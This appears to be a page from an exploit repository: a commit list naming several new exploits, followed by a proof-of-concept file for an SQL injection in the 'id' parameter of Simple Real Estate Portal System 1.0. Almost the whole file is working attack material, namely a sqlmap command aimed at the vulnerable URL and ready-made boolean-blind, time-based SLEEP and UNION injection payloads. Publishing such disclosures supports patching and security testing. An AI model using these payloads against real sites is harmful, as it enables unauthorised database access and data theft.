7755ac3af6
9 changes to exploits/shellcodes Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE) ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 - Remote File CRUD Simple Real Estate Portal System 1.0 - 'id' SQLi Air Cargo Management System v1.0 - SQLi aaPanel 6.8.21 - Directory Traversal (Authenticated) Student Record System 1.0 - 'cid' SQLi (Authenticated) WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated) WebHMI 4.1 - Stored Cross Site Scripting (XSS) (Authenticated) Microweber CMS 1.2.10 - Local File Inclusion (Authenticated) (Metasploit)
28 lines
No EOL
1.1 KiB
Text
28 lines
No EOL
1.1 KiB
Text
# Exploit Title: Simple Real Estate Portal System 1.0 - 'id' SQL Injection
|
|
# Date: 22/02/2022
|
|
# Exploit Author: Mosaaed
|
|
# Vendor Homepage: https://www.sourcecodester.com/
|
|
# Software Link: https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html
|
|
# Version: 1.0
|
|
# Tested on: Linux mosaaed 5.5.0-1parrot1-amd64 #1 SMP Parrot 5.5.17-1parrot1 (2020-04-25) x86_64 GNU/Linux
|
|
|
|
|
|
|
|
# Sqlmap command:
|
|
|
|
sqlmap -u "http://localhost/reps/?p=view_estate&id=6" --batch --dbs
|
|
|
|
# Output:
|
|
|
|
Parameter: id (GET)
|
|
Type: boolean-based blind
|
|
Title: AND boolean-based blind - WHERE or HAVING clause
|
|
Payload: p=view_estate&id=6' AND 9373=9373 AND 'CcAj'='CcAj
|
|
|
|
Type: time-based blind
|
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
|
Payload: p=view_estate&id=6' AND (SELECT 4967 FROM (SELECT(SLEEP(5)))Lowr) AND 'iyVC'='iyVC
|
|
|
|
Type: UNION query
|
|
Title: Generic UNION query (NULL) - 9 columns
|
|
Payload: p=view_estate&id=-3391' UNION ALL SELECT NULL,CONCAT(0x716b7a7a71,0x6a56556147504d795a536b566c7a4f5659677a65514c706758485a66484f464e5676496470695a41,0x7162767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - |